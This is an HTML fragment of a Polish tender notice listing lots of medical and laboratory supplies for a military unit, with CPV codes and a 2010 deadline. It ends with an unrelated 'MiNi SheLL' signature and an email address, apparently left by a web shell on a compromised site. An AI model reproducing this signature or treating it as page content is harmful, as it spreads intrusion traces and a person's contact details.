<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - ODCZYNNIKI CHEMICZNE I LABORATORYJNE ORAZ produkty farmaceutyczne - leki. OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet Nr 1 - waga oraz rozwieracz szczękowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - SPRZĘT I MATERIAŁY MEDYCZNE ORAZ JEDNORAZOWEGO UŻYTKU I NIECHEMICZNE ARTYKUŁY MEDYCZNE. OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ ,JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.92.31.10-9, 33.13.11.13-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet Nr 2 - łaźnie termostatyczne i akcesoria.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - SPRZĘT I MATERIAŁY MEDYCZNE ORAZ JEDNORAZOWEGO UŻYTKU I NIECHEMICZNE ARTYKUŁY MEDYCZNE. OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ ,JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.94.30.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet Nr 3 aparatura do czyszczenia pod ciśnieniem, nosze, pulsoksymetr weterynaryjny, lampa kieszonkowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - SPRZĘT I MATERIAŁY MEDYCZNE ORAZ JEDNORAZOWEGO UŻYTKU I NIECHEMICZNE ARTYKUŁY MEDYCZNE. OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ ,JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.92.47.30-5, 33.14.10.00-0, 33.19.21.60-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet Nr 4 - Sprzęt Laboratoryjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - SPRZĘT I MATERIAŁY MEDYCZNE ORAZ JEDNORAZOWEGO UŻYTKU I NIECHEMICZNE ARTYKUŁY MEDYCZNE. wytrząsarka typu Vortex z wyposażeniem do próbówek typu Vortex, typ TKS3, ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet Nr 5 - Sprzęt Laboratoryjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - SPRZĘT I MATERIAŁY MEDYCZNE ORAZ JEDNORAZOWEGO UŻYTKU I NIECHEMICZNE ARTYKUŁY MEDYCZNE. Dalmierz Laserowy.  SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.40.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet Nr 6 Sprzęt Laboratoryjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - SPRZĘT I MATERIAŁY MEDYCZNE ORAZ JEDNORAZOWEGO UŻYTKU I NIECHEMICZNE ARTYKUŁY MEDYCZNE - Miernik Temperatury, OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ ,JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.40.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet Nr 7 Sprzęt Laboratoryjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - SPRZĘT I MATERIAŁY MEDYCZNE ORAZ JEDNORAZOWEGO UŻYTKU I NIECHEMICZNE ARTYKUŁY MEDYCZNE - Automat pompowy -  OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ ,JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.40.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet Nr 8 Przyrządy laboratoryjne i laboratoryjne wyroby szklane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - SPRZĘT I MATERIAŁY MEDYCZNE ORAZ JEDNORAZOWEGO UŻYTKU I NIECHEMICZNE ARTYKUŁY MEDYCZNE - Półautomatyczny licznik koloni drobnoustrojów, lejki szklane, zestaw do filtracji wody -  OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ ,JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.40.00.00-9, 33.79.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet Nr 9 Laboratoryjne wyroby z tworzyw sztucznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - SPRZĘT I MATERIAŁY MEDYCZNE ORAZ JEDNORAZOWEGO UŻYTKU I NIECHEMICZNE ARTYKUŁY MEDYCZNE - Szpatułki - OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ ,JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet Nr 10 Laboratoryjne wyroby z tworzyw sztucznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - SPRZĘT I MATERIAŁY MEDYCZNE ORAZ JEDNORAZOWEGO UŻYTKU I NIECHEMICZNE ARTYKUŁY MEDYCZNE - Torebki na odpady -  OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ ,JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet Nr 11 Laboratoryjne wyroby z tworzyw sztucznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - SPRZĘT I MATERIAŁY MEDYCZNE ORAZ JEDNORAZOWEGO UŻYTKU I NIECHEMICZNE ARTYKUŁY MEDYCZNE - Skrzynka Narzędziowa -  OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ ,JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet Nr 12 - Jednorazowe niechemiczne artykuły i materiały medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - SPRZĘT I MATERIAŁY MEDYCZNE ORAZ JEDNORAZOWEGO UŻYTKU I NIECHEMICZNE ARTYKUŁY MEDYCZNE - Gaza w metrach i gaziki -  OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ ,JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.14-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet Nr 13 Jednorazowe niechemiczne artykuły i materiały medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - SPRZĘT I MATERIAŁY MEDYCZNE ORAZ JEDNORAZOWEGO UŻYTKU I NIECHEMICZNE ARTYKUŁY MEDYCZNE - igły, strzykawki, kompresy gazowe - jałowe, rękawiczki -  OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ ,JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet Nr 14 Jednorazowe niechemiczne artykuły i materiały medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - SPRZĘT I MATERIAŁY MEDYCZNE ORAZ JEDNORAZOWEGO UŻYTKU I NIECHEMICZNE ARTYKUŁY MEDYCZNE. OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ ,JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet Nr 1 Urządzenia medyczne z przeznaczeniem dla Izby Chorych Jw 2189 Kazuń Nowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - Urządzenia Medyczne, dodatkowe wyroby ortopedyczne, kosze na odpady i apteczki samochodowe i przemysłowe. OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ ,JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5B DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.18.30.00-6, 34.92.84.80-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet Nr 2 Apteczki samochodowe  i przemysłowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - Urządzenia Medyczne, dodatkowe wyroby ortopedyczne, kosze na odpady i apteczki samochodowe i przemysłowe. OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ ,JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5B DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com